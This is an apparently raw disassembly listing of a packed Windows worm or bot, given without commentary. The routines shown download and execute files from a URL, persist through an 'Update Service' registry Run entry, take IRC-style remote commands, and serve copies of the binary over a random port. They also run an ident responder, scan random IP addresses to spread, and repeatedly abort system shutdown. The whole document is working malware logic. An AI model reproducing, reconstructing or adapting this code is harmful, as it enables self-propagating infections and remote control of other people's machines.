lea eax, [ebp+var_110]
push 40000000h
push eax
call dword_313010A8 ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_313026DC
push 2
jmp short loc_313026FC
; ---------------------------------------------------------------------------
loc_313026DC: ; CODE XREF: sub_3130263B+9B�j
push esi
push esi
push esi
push esi
push [ebp+arg_0]
push ebx
call dword_31301148 ; InternetOpenUrlA
cmp eax, esi
mov [ebp+arg_0], eax
jnz short loc_313026FF
push [ebp+var_4]
call dword_313010A0 ; CloseHandle
push 3
loc_313026FC: ; CODE XREF: sub_3130263B+26�j
; sub_3130263B+9F�j
pop eax
jmp short loc_31302750
; ---------------------------------------------------------------------------
loc_313026FF: ; CODE XREF: sub_3130263B+B4�j
mov edi, 100000h
push edi
call sub_31303717
mov ebx, eax
pop ecx
lea eax, [ebp+var_8]
push eax
push edi
push ebx
push [ebp+arg_0]
call dword_31301144 ; InternetReadFile
lea eax, [ebp+var_C]
push esi
push eax
push [ebp+var_8]
push ebx
push [ebp+var_4]
call dword_313010A4 ; WriteFile
push [ebp+var_4]
call dword_313010A0 ; CloseHandle
lea eax, [ebp+var_110]
push 5
push eax
call sub_31302B15
push ebx
call sub_3130372B
add esp, 0Ch
xor eax, eax
loc_31302750: ; CODE XREF: sub_3130263B+C2�j
pop edi
pop esi
pop ebx
leave
retn
sub_3130263B endp
; =============== S U B R O U T I N E =======================================
sub_31302755 proc near ; CODE XREF: sub_31302260+C0�p
var_3CC = dword ptr -3CCh
var_3C8 = byte ptr -3C8h
var_364 = byte ptr -364h
var_300 = byte ptr -300h
var_200 = byte ptr -200h
var_100 = byte ptr -100h
var_FF = byte ptr -0FFh
arg_0 = dword ptr 4
sub esp, 3CCh
push ebx
push ebp
push esi
push edi
push offset dword_31304FA0
mov esi, ecx
push [esp+3E0h+arg_0]
call dword_3130110C ; strstr
mov edi, dword_313010E8
pop ecx
mov ebx, eax
pop ecx
mov [esp+3DCh+var_3CC], ebx
call edi ; GetTickCount
sub eax, [esi+70h]
cmp eax, 927C0h
jbe short loc_31302794
and dword ptr [esi+180h], 0
loc_31302794: ; CODE XREF: sub_31302755+36�j
cmp dword ptr [esi+7Ch], 0
jz short loc_313027F7
call edi ; GetTickCount
mov ecx, [esi+78h]
sub eax, [esi+74h]
imul ecx, 3E8h
cmp eax, ecx
jbe short loc_313027F7
lea eax, [esp+3DCh+var_200]
push eax
call sub_3130263B
test eax, eax
pop ecx
jnz short loc_313027F7
call edi ; GetTickCount
push dword ptr [esi+78h]
and dword ptr [esi+7Ch], 0
mov [esi+70h], eax
lea eax, [esp+3E0h+var_3C8]
push offset a1D ; "-1,%d"
push eax
mov dword ptr [esi+180h], 1
call dword_31301134 ; wsprintfA
add esp, 0Ch
lea eax, [esp+3DCh+var_3C8]
mov ecx, esi
push eax
lea eax, [esi+30h]
push eax
call sub_3130235D
loc_313027F7: ; CODE XREF: sub_31302755+43�j
; sub_31302755+55�j ...
test ebx, ebx
jz loc_31302A37
push ebx
call dword_313010CC ; lstrlen
cmp eax, 0Ah
jle loc_31302A37
mov ebp, dword_31301110
add ebx, 8
push 7Ch
push ebx
call ebp ; strchr
mov edi, eax
pop ecx
test edi, edi
pop ecx
jz loc_31302A37
and byte ptr [edi], 0
push ebx
call dword_313010CC ; lstrlen
cmp eax, 100h
jge loc_31302A5E
push dword_31304F9C
lea eax, [esp+3E0h+var_300]
push ebx
push eax
call sub_31301DB0
lea ebx, [edi+1]
push 7Ch
push ebx
mov byte ptr [edi], 7Ch
call ebp ; strchr
mov edi, eax
add esp, 14h
test edi, edi
jz loc_31302A37
and byte ptr [edi], 0
push ebx
call dword_313010CC ; lstrlen
cmp eax, 100h
jge loc_31302A5E
push dword_31304F9C
lea eax, [esp+3E0h+var_200]
push ebx
push eax
call sub_31301DB0
add esp, 0Ch
lea eax, [esp+3DCh+var_300]
push offset aE ; "e"
push eax
call dword_31301088 ; lstrcmp
mov ebx, dword_31301090
test eax, eax
jnz loc_3130299E
lea eax, [esp+3DCh+var_200]
push eax
call dword_313010CC ; lstrlen
cmp eax, 0FFh
jge loc_3130299E
cmp dword ptr [esi+180h], 0
jnz loc_3130299E
cmp dword ptr [esi+7Ch], 0
jnz loc_3130299E
lea eax, [edi+1]
push 7Ch
push eax
call ebp ; strchr
mov ebp, eax
pop ecx
test ebp, ebp
pop ecx
jz loc_3130297F
and byte ptr [ebp+0], 0
lea eax, [edi+1]
push eax
call dword_313010CC ; lstrlen
cmp eax, 100h
jge loc_31302A5E
lea eax, [edi+1]
push eax
lea eax, [esp+3E0h+var_100]
push eax
call ebx ; lstrcpy
push [esp+3DCh+var_3CC]
lea eax, [esi+80h]
mov byte ptr [edi], 7Ch
push eax
call ebx ; lstrcpy
mov byte ptr [ebp+0], 7Ch
and byte ptr [edi], 0
cmp [esp+3DCh+var_100], 62h
jle short loc_3130298C
lea eax, [esp+3DCh+var_FF]
push eax
call dword_313010FC ; atoi
mov ebp, eax
pop ecx
test ebp, ebp
jz short loc_3130298C
cmp ebp, 0E10h
jnb short loc_3130298C
call dword_31301120 ; rand
xor edx, edx
mov dword ptr [esi+7Ch], 1
div ebp
mov [esi+78h], edx
call dword_313010E8 ; GetTickCount
mov [esi+74h], eax
jmp short loc_3130298C
; ---------------------------------------------------------------------------
loc_3130297F: ; CODE XREF: sub_31302755+1A0�j
push [esp+3DCh+var_3CC]
lea eax, [esi+80h]
push eax
call ebx ; lstrcpy
loc_3130298C: ; CODE XREF: sub_31302755+1EC�j
; sub_31302755+201�j ...
lea eax, [esi+80h]
push offset asc_31304E34 ; "|"
push eax
call dword_313010EC ; lstrcat
loc_3130299E: ; CODE XREF: sub_31302755+15C�j
; sub_31302755+175�j ...
mov ebp, dword_31301088
lea eax, [esp+3DCh+var_300]
push offset aI ; "i"
push eax
call ebp ; lstrcmp
test eax, eax
jnz short loc_31302A14
lea eax, [esp+3DCh+var_3C8]
push offset dword_31304FC0
push eax
call ebx ; lstrcpy
lea eax, [esp+3DCh+var_3C8]
push 63h
push eax
push 7
push 400h
call dword_31301088+4
push ds:dword_31305004
lea eax, [esp+3E0h+var_3C8]
push eax
lea eax, [esp+3E4h+var_364]
push ds:dword_31305000
push dword_31304FC8
push offset aDD9SD ; "%d,%d,9%s,%d"
push eax
call dword_31301134 ; wsprintfA
add esp, 18h
lea eax, [esp+3DCh+var_364]
mov ecx, esi
push eax
lea eax, [esi+30h]
push eax
call sub_3130235D
loc_31302A14: ; CODE XREF: sub_31302755+260�j
lea eax, [esp+3DCh+var_300]
push offset aQ ; "q"
push eax
call ebp ; lstrcmp
test eax, eax
jnz short loc_31302A34
cmp [esi+180h], eax
jz short loc_31302A34
push 1
pop eax
jmp short loc_31302A60
; ---------------------------------------------------------------------------
loc_31302A34: ; CODE XREF: sub_31302755+2D0�j
; sub_31302755+2D8�j
mov byte ptr [edi], 7Ch
loc_31302A37: ; CODE XREF: sub_31302755+A4�j
; sub_31302755+B4�j ...
cmp dword ptr [esi+180h], 0
jz short loc_31302A5E
push offset aJoin ; "JOIN"
push [esp+3E0h+arg_0]
call dword_3130110C ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_31302A5E
call dword_31301120 ; rand
loc_31302A5E: ; CODE XREF: sub_31302755+E3�j
; sub_31302755+124�j ...
xor eax, eax
loc_31302A60: ; CODE XREF: sub_31302755+2DD�j
pop edi
pop esi
pop ebp
pop ebx
add esp, 3CCh
retn 4
sub_31302755 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31302A6D proc near ; CODE XREF: sub_313014C6+8�p
; sub_313023D4+57�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
pusha
rdtsc
mov [ebp+var_8], eax
popa
mov [ebp+var_4], esp
call dword_313010E8 ; GetTickCount
mov ecx, [ebp+var_4]
imul ecx, [ebp+var_8]
add eax, ecx
push eax
call dword_31301100 ; srand
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_31302A6D endp
; =============== S U B R O U T I N E =======================================
sub_31302A9B proc near ; CODE XREF: sub_31301C20+EA�p
; UPX0:31302DDB�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
push 1
push 0
call dword_31301084 ; CreateMutexA
retn
sub_31302A9B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31302AAA proc near ; CODE XREF: sub_31302E37+7C�p
; sub_31302E37+8A�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_313010C4 ; CreateThread
pop ebp
retn
sub_31302AAA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31302AC4 proc near ; CODE XREF: sub_31302C49+12C�p
; sub_31302E37+62�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_313010C4 ; CreateThread
push eax
call dword_313010A0 ; CloseHandle
pop ebp
retn
sub_31302AC4 endp
; =============== S U B R O U T I N E =======================================
sub_31302AE5 proc near ; CODE XREF: sub_31301E60+88�p
; sub_31301E60+155�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
push esi
push edi
mov edi, [esp+0Ch+arg_4]
xor esi, esi
test edi, edi
jle short loc_31302B0D
loc_31302AF6: ; CODE XREF: sub_31302AE5+26�j
call dword_31301120 ; rand
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [esi+ebx], dl
inc esi
cmp esi, edi
jl short loc_31302AF6
loc_31302B0D: ; CODE XREF: sub_31302AE5+F�j
and byte ptr [ebx+edi], 0
pop edi
pop esi
pop ebx
retn
sub_31302AE5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31302B15 proc near ; CODE XREF: sub_31301341+16B�p
; sub_3130263B+105�p
var_54 = dword ptr -54h
var_24 = word ptr -24h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
sub esp, 54h
push esi
push edi
push 44h
xor esi, esi
pop edi
lea eax, [ebp+var_54]
push edi
push esi
push eax
call sub_31303744 ; memset
mov ax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_24], ax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
push esi
push esi
push esi
push esi
push esi
push esi
mov [ebp+var_54], edi
push [ebp+arg_0]
push esi
call dword_31301080 ; CreateProcessA
push [ebp+var_C]
mov esi, dword_313010A0
mov edi, eax
call esi ; CloseHandle
push [ebp+var_10]
call esi ; CloseHandle
mov eax, edi
pop edi
pop esi
leave
retn
sub_31302B15 endp
; =============== S U B R O U T I N E =======================================
sub_31302B6B proc near ; CODE XREF: sub_31301E60+20�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
push edi
call dword_31301160 ; inet_addr
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_31302B88
test esi, esi
jnz short loc_31302B9A
cmp byte ptr [edi], 30h
jz short loc_31302BA1
loc_31302B88: ; CODE XREF: sub_31302B6B+12�j
push edi
call dword_31301164 ; gethostbyname
test eax, eax
jz short loc_31302B9A
mov eax, [eax+0Ch]
mov eax, [eax]
mov esi, [eax]
loc_31302B9A: ; CODE XREF: sub_31302B6B+16�j
; sub_31302B6B+26�j
cmp esi, 0FFFFFFFFh
jnz short loc_31302BA1
xor esi, esi
loc_31302BA1: ; CODE XREF: sub_31302B6B+1B�j
; sub_31302B6B+32�j
mov eax, esi
pop edi
pop esi
retn
sub_31302B6B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31302BA6 proc near ; CODE XREF: sub_31303196+37�p
; sub_31303256+4E�p
var_34 = byte ptr -34h
push ebp
mov ebp, esp
sub esp, 34h
lea eax, [ebp+var_34]
push 31h
push eax
call dword_31301158 ; gethostname
cmp eax, 0FFFFFFFFh
jnz short loc_31302BC7
call dword_3130115C ; WSAGetLastError
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_31302BC7: ; CODE XREF: sub_31302BA6+15�j
lea eax, [ebp+var_34]
push eax
call dword_31301164 ; gethostbyname
test eax, eax
jnz short loc_31302BDC
mov eax, 100007Fh
leave
retn
; ---------------------------------------------------------------------------
loc_31302BDC: ; CODE XREF: sub_31302BA6+2D�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
leave
retn
sub_31302BA6 endp
; =============== S U B R O U T I N E =======================================
sub_31302BE5 proc near ; CODE XREF: sub_31302260:loc_3130229B�p
; sub_31302260+CD�p ...
var_4 = byte ptr -4
push ecx
lea eax, [esp+4+var_4]
push 0
push eax
call dword_3130113C ; InternetGetConnectedState
neg eax
sbb eax, eax
neg eax
pop ecx
retn
sub_31302BE5 endp
; =============== S U B R O U T I N E =======================================
sub_31302BFB proc near ; DATA XREF: sub_31302C49+127�o
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push 0
push dword_31304FCC
push dword_31304FC4
push esi
call dword_31301194 ; send
push 7D0h
call dword_313010D0 ; Sleep
push offset dword_31304FC8
call dword_3130107C ; InterlockedIncrement
push 2
push esi
call dword_31301174 ; shutdown
push esi
call dword_3130118C ; closesocket
push 0
call dword_313010B8 ; ExitThread
xor eax, eax
pop esi
retn 4
sub_31302BFB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31302C49 proc near ; DATA XREF: sub_31302E37+82�o
var_130 = byte ptr -130h
var_28 = byte ptr -28h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 130h
push ebx
push edi
call sub_31302A6D
lea eax, [ebp+var_130]
push 104h
push eax
push offset aUpdateService ; "Update Service"
xor ebx, ebx
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
mov dword_31304FC8, ebx
call sub_3130336A
add esp, 14h
test eax, eax
jnz loc_31302D7E
push esi
push ebx
push ebx
push 3
push ebx
push 1
lea eax, [ebp+var_130]
push 80000000h
push eax
call dword_313010A8 ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_31302CB5
push 1
call dword_313010B8 ; ExitThread
loc_31302CB5: ; CODE XREF: sub_31302C49+62�j
push ebx
push esi
call dword_31301074 ; GetFileSize
push eax
mov dword_31304FCC, eax
call sub_31303717
pop ecx
mov dword_31304FC4, eax
lea ecx, [ebp+var_4]
push ebx
push ecx
push dword_31304FCC
push eax
push esi
call dword_31301078 ; ReadFile
mov eax, [ebp+var_4]
push esi
mov dword_31304FCC, eax
call dword_313010A0 ; CloseHandle
push ebx
push 1
push 2
call dword_31301178 ; socket
push 10h
mov edi, eax
pop esi
lea eax, [ebp+var_18]
push esi
push ebx
push eax
call sub_31303744 ; memset
add esp, 0Ch
mov [ebp+var_18], 2
mov [ebp+var_14], ebx
loc_31302D17: ; CODE XREF: sub_31302C49+E5�j
; sub_31302C49+ED�j ...
call dword_31301120 ; rand
add eax, 7D0h
and eax, 1FFFh
cmp al, bl
mov dword_31304FF8, eax
jz short loc_31302D17
xor ecx, ecx
mov cl, ah
test cl, cl
jz short loc_31302D17
push eax
call dword_3130117C ; htons
mov [ebp+var_16], ax
lea eax, [ebp+var_18]
push esi
push eax
push edi
call dword_31301180 ; bind
test eax, eax
jnz short loc_31302D17
push 64h
push edi
call dword_31301184 ; listen
mov [ebp+var_8], esi
pop esi
loc_31302D60: ; CODE XREF: sub_31302C49+133�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_28]
push eax
push edi
call dword_31301188 ; accept
push eax
push offset sub_31302BFB
call sub_31302AC4
pop ecx
pop ecx
jmp short loc_31302D60
; ---------------------------------------------------------------------------
loc_31302D7E: ; CODE XREF: sub_31302C49+3D�j
push ebx
call dword_313010B8 ; ExitThread
pop edi
xor eax, eax
pop ebx
leave
retn 4
sub_31302C49 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31302D8D proc near ; CODE XREF: sub_31302E37+1F�p
var_190 = byte ptr -190h
push ebp
mov ebp, esp
sub esp, 190h
lea eax, [ebp+var_190]
push esi
mov esi, dword_31301150
push eax
push 2
call esi ; WSAStartup
lea eax, [ebp+var_190]
push eax
push 102h
call esi ; WSAStartup
pop esi
leave
retn
sub_31302D8D endp
; ---------------------------------------------------------------------------
loc_31302DB9: ; CODE XREF: UPX1:313072D8�j
push 0
call dword_313010DC ; GetModuleHandleA
push offset aFtpupd_exe ; "ftpupd.exe"
mov dword_31304FFC, eax
call dword_3130106C ; DeleteFileA
call sub_31302A6D
push offset aUterm_9 ; "uterm_9"
call sub_31302A9B
pop ecx
mov dword_31304FD0, eax
call dword_31301094 ; RtlGetLastWin32Error
cmp eax, 0B7h
jnz short loc_31302DFB
push 1
call dword_31301070 ; ExitProcess
loc_31302DFB: ; CODE XREF: UPX0:31302DF1�j
call sub_31301B98
call sub_313034CE
call sub_31303641
push offset sub_31302E37
call sub_31301C20
test eax, eax
pop ecx
jz short loc_31302E20
push 0
call sub_31302E37
loc_31302E20: ; CODE XREF: UPX0:31302E17�j
xor eax, eax
retn
; =============== S U B R O U T I N E =======================================
sub_31302E23 proc near ; CODE XREF: sub_31302E37:loc_31302EE8�p
; sub_313030B2:loc_313030CA�p ...
push 0
push dword_31304FD4
call dword_313010C0 ; WaitForSingleObject
neg eax
sbb eax, eax
inc eax
retn
sub_31302E23 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31302E37 proc near ; CODE XREF: UPX0:31302E1B�p
; DATA XREF: UPX0:31302E0A�o
var_20 = dword ptr -20h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
xor edi, edi
push offset aU9x ; "u9x"
push edi
push 1
push edi
call dword_313010C8 ; CreateEventA
mov dword_31304FD4, eax
call sub_31302D8D
push offset aU6 ; "u6"
call sub_31302A9B
mov [esp+20h+var_20], offset aU7 ; "u7"
call sub_31302A9B
mov [esp+20h+var_20], offset aU9 ; "u9"
call sub_31302A9B
cmp [ebp+arg_0], edi
pop ecx
jz short loc_31302E93
push offset aUterm_9 ; "uterm_9"
call sub_31302A9B
pop ecx
mov dword_31304FD0, eax
loc_31302E93: ; CODE XREF: sub_31302E37+4A�j
push edi
push offset sub_31302F59
call sub_31302AC4
mov esi, dword_313010D0
pop ecx
pop ecx
push 1F4h
call esi ; Sleep
push edi
push offset loc_31302432
call sub_31302AAA
push edi
push offset sub_31302C49
mov [ebp+var_10], eax
call sub_31302AAA
push edi
push offset sub_31301562
mov [ebp+var_C], eax
call sub_31302AAA
push edi
push offset sub_31303256
mov [ebp+var_8], eax
call sub_31302AAA
add esp, 20h
mov [ebp+var_4], eax
loc_31302EE8: ; CODE XREF: sub_31302E37+C8�j
call sub_31302E23
test eax, eax
jnz short loc_31302F01
push edi
call dword_31301018 ; AbortSystemShutdownA
push 1388h
call esi ; Sleep
jmp short loc_31302EE8
; ---------------------------------------------------------------------------
loc_31302F01: ; CODE XREF: sub_31302E37+B8�j
push 4
lea edi, [ebp+var_10]
pop ebx
loc_31302F07: ; CODE XREF: sub_31302E37+E6�j
mov esi, [edi]
push 1
push esi
call dword_31301068 ; TerminateThread
push esi
call dword_313010A0 ; CloseHandle
add edi, 4
dec ebx
jnz short loc_31302F07
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
sub_31302E37 endp
; =============== S U B R O U T I N E =======================================
sub_31302F28 proc near ; CODE XREF: sub_31302F59+F9�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
xor esi, esi
push edi
call sub_3130374A ; strlen
test eax, eax
pop ecx
jbe short loc_31302F56
loc_31302F3B: ; CODE XREF: sub_31302F28+2C�j
mov al, [esi+edi]
cmp al, 0Ah
jz short loc_31302F46
cmp al, 0Dh
jnz short loc_31302F4A
loc_31302F46: ; CODE XREF: sub_31302F28+18�j
and byte ptr [esi+edi], 0
loc_31302F4A: ; CODE XREF: sub_31302F28+1C�j
push edi
inc esi
call sub_3130374A ; strlen
cmp esi, eax
pop ecx
jb short loc_31302F3B
loc_31302F56: ; CODE XREF: sub_31302F28+11�j
pop edi
pop esi
retn
sub_31302F28 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31302F59 proc near ; DATA XREF: sub_31302E37+5D�o
var_154 = dword ptr -154h
var_148 = byte ptr -148h
var_48 = byte ptr -48h
var_28 = byte ptr -28h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 148h
push ebx
mov [ebp+var_8], esp
call sub_31302A6D
call dword_31301120 ; rand
push 4
cdq
pop ecx
idiv ecx
lea eax, [ebp+var_48]
add edx, 3
push edx
push eax
call sub_31302AE5
lea eax, [ebp+var_48]
mov ebx, offset dword_31304FD8
push eax
push ebx
call sub_3130379C ; _mbscpy
add esp, 10h
mov [ebp+var_4], 10h
push 0
push 1
push 2
call dword_31301178 ; socket
push 0
mov [ebp+var_8], eax
mov [ebp+var_18], 2
call dword_31301154 ; htonl
push 71h
mov [ebp+var_14], eax
call dword_3130117C ; htons
push [ebp+var_4]
mov [ebp+var_16], ax
lea eax, [ebp+var_18]
push eax
push [ebp+var_8]
call dword_31301180 ; bind
test eax, eax
jz short loc_31302FE5
push 1
pop eax
loc_31302FE0: ; CODE XREF: sub_31302F59+A2�j
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_31302FE5: ; CODE XREF: sub_31302F59+82�j
push esi
push edi
push 5
push [ebp+var_8]
call dword_31301184 ; listen
test eax, eax
jz short loc_31302FFD
push 1
pop eax
pop edi
pop esi
jmp short loc_31302FE0
; ---------------------------------------------------------------------------
loc_31302FFD: ; CODE XREF: sub_31302F59+9B�j
mov edi, dword_313010D0
loc_31303003: ; CODE XREF: sub_31302F59+C6�j
; sub_31302F59+E8�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_28]
push eax
push [ebp+var_8]
call dword_31301188 ; accept
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_31303021
push 64h
call edi ; Sleep
jmp short loc_31303003
; ---------------------------------------------------------------------------
loc_31303021: ; CODE XREF: sub_31302F59+C0�j
push 0
lea eax, [ebp+var_148]
push 100h
push eax
push esi
call dword_31301190 ; recv
test eax, eax
jnz short loc_31303043
loc_3130303A: ; CODE XREF: sub_31302F59+157�j
push esi
call dword_3130118C ; closesocket
jmp short loc_31303003
; ---------------------------------------------------------------------------
loc_31303043: ; CODE XREF: sub_31302F59+DF�j
and [ebp+eax+var_148], 0
lea eax, [ebp+var_148]
push eax
call sub_31302F28
lea eax, [ebp+var_148]
mov [esp+154h+var_154], offset aUseridUnix ; " : USERID : UNIX : "
push eax
call sub_31303796 ; _mbscat
lea eax, [ebp+var_148]
push ebx
push eax
call sub_31303796 ; _mbscat
lea eax, [ebp+var_148]
push offset asc_31304E60 ; "\r\n"
push eax
call sub_31303796 ; _mbscat
add esp, 18h
lea eax, [ebp+var_148]
push 0
push eax
call sub_3130374A ; strlen
pop ecx
push eax
lea eax, [ebp+var_148]
push eax
push esi
call dword_31301194 ; send
push 1388h
call edi ; Sleep
jmp short loc_3130303A
sub_31302F59 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_313030B2 proc near ; DATA XREF: sub_31303112+54�o
; sub_31303196+63�o ...
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_313030C1
push 1
pop eax
jmp short locret_3130310E
; ---------------------------------------------------------------------------
loc_313030C1: ; CODE XREF: sub_313030B2+8�j
mov al, byte ptr [ebp+arg_0+3]
push ebx
mov [ebp+var_1], al
xor bl, bl
loc_313030CA: ; CODE XREF: sub_313030B2+57�j
call sub_31302E23
test eax, eax
jnz short loc_3130310B
call sub_31302BE5
test eax, eax
jz short loc_3130310B
cmp [ebp+var_1], bl
jz short loc_31303104
mov byte ptr [ebp+arg_0+3], bl
push [ebp+arg_0]
call sub_31301631
pop ecx
call dword_31301120 ; rand
cdq
mov ecx, 15Eh
idiv ecx
add edx, ecx
push edx
call dword_313010D0 ; Sleep
loc_31303104: ; CODE XREF: sub_313030B2+2D�j
inc bl
cmp bl, 0FFh
jb short loc_313030CA
loc_3130310B: ; CODE XREF: sub_313030B2+1F�j
; sub_313030B2+28�j
xor eax, eax
pop ebx
locret_3130310E: ; CODE XREF: sub_313030B2+D�j
leave
retn 4
sub_313030B2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31303112 proc near ; DATA XREF: sub_31303196+73�o
; sub_31303256+AA�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_31303120
push 1
pop eax
jmp short loc_31303192
; ---------------------------------------------------------------------------
loc_31303120: ; CODE XREF: sub_31303112+7�j
push ebx
push esi
call sub_31302A6D
mov esi, dword_31301120
xor ebx, ebx
loc_3130312F: ; CODE XREF: sub_31303112+7A�j
call sub_31302E23
test eax, eax
jnz short loc_3130318E
call sub_31302BE5
test eax, eax
jz short loc_3130318E
call esi ; rand
mov byte ptr [ebp+arg_0+2], al
call esi ; rand
push offset dword_31305000
mov byte ptr [ebp+arg_0+3], al
call dword_3130107C ; InterlockedIncrement
push [ebp+arg_0]
call sub_31301631
test eax, eax
pop ecx
jnz short loc_31303172
push [ebp+arg_0]
push offset sub_313030B2
call sub_31302AC4
pop ecx
pop ecx
loc_31303172: ; CODE XREF: sub_31303112+4F�j
call esi ; rand
cdq
mov ecx, 15Eh
idiv ecx
add edx, ecx
push edx
call dword_313010D0 ; Sleep
inc ebx
cmp ebx, 8000h
jl short loc_3130312F
loc_3130318E: ; CODE XREF: sub_31303112+24�j
; sub_31303112+2D�j
pop esi
xor eax, eax
pop ebx
loc_31303192: ; CODE XREF: sub_31303112+C�j
pop ebp
retn 4
sub_31303112 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31303196 proc near ; DATA XREF: sub_31303256+C2�o
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
call sub_31302A6D
call sub_31302E23
test eax, eax
jnz loc_31303248
push ebx
push esi
mov esi, dword_31301120
push edi
loc_313031B5: ; CODE XREF: sub_31303196+41�j
; sub_31303196+A9�j
call esi ; rand
mov byte ptr [ebp+var_4+1], al
call esi ; rand
mov byte ptr [ebp+var_4+3], al
call esi ; rand
mov byte ptr [ebp+var_4+2], al
loc_313031C4: ; CODE XREF: sub_31303196+35�j
call esi ; rand
cmp al, 7Fh
mov byte ptr [ebp+var_4], al
jz short loc_313031C4
call sub_31302BA6
mov edi, [ebp+var_4]
cmp edi, eax
jz short loc_313031B5
call sub_31302BE5
test eax, eax
jz short loc_3130321A
push offset dword_31305000
call dword_3130107C ; InterlockedIncrement
push edi
call sub_31301631
test eax, eax
pop ecx
jnz short loc_31303225
push edi
push offset sub_313030B2
call sub_31302AC4
pop ecx
pop ecx
push 4
pop ebx
loc_31303208: ; CODE XREF: sub_31303196+80�j
push edi
push offset sub_31303112
call sub_31302AC4
pop ecx
dec ebx
pop ecx
jnz short loc_31303208
jmp short loc_31303225
; ---------------------------------------------------------------------------
loc_3130321A: ; CODE XREF: sub_31303196+4A�j
push 2710h
call dword_313010D0 ; Sleep
loc_31303225: ; CODE XREF: sub_31303196+60�j
; sub_31303196+82�j
call esi ; rand
cdq
mov ecx, 15Eh
idiv ecx
add edx, ecx
push edx
call dword_313010D0 ; Sleep
call sub_31302E23
test eax, eax
jz loc_313031B5
pop edi
pop esi
pop ebx
loc_31303248: ; CODE XREF: sub_31303196+10�j
push 0
call dword_313010B8 ; ExitThread
xor eax, eax
leave
retn 4
sub_31303196 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31303256 proc near ; DATA XREF: sub_31302E37+9E�o
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
xor esi, esi
mov ds:dword_31305000, esi
loc_31303266: ; CODE XREF: sub_31303256+24�j
call sub_31302BE5
test eax, eax
jnz short loc_3130327C
push 1388h
call dword_313010D0 ; Sleep
jmp short loc_31303266
; ---------------------------------------------------------------------------
loc_3130327C: ; CODE XREF: sub_31303256+17�j
lea eax, [ebp+var_4]
push esi
push eax
call dword_3130113C ; InternetGetConnectedState
test [ebp+var_4], 2
push 50h
mov ds:dword_31305004, esi
pop ebx
jz short loc_313032A3
mov ds:dword_31305004, 1
add ebx, 46h
loc_313032A3: ; CODE XREF: sub_31303256+3E�j
push edi
call sub_31302BA6
mov esi, eax
mov ax, word ptr dword_31304FF8
push eax
call dword_3130117C ; htons
mov [ebp+var_8], eax
lea eax, [ebp+var_8]
push 2
push eax
push offset loc_31304122
call sub_3130373E ; memcpy
mov eax, esi
push 4
xor eax, 0AAAAAAAAh
pop edi
mov [ebp+var_C], eax
lea eax, [ebp+var_C]
push edi
push eax
push offset loc_31304124
call sub_3130373E ; memcpy
add esp, 18h
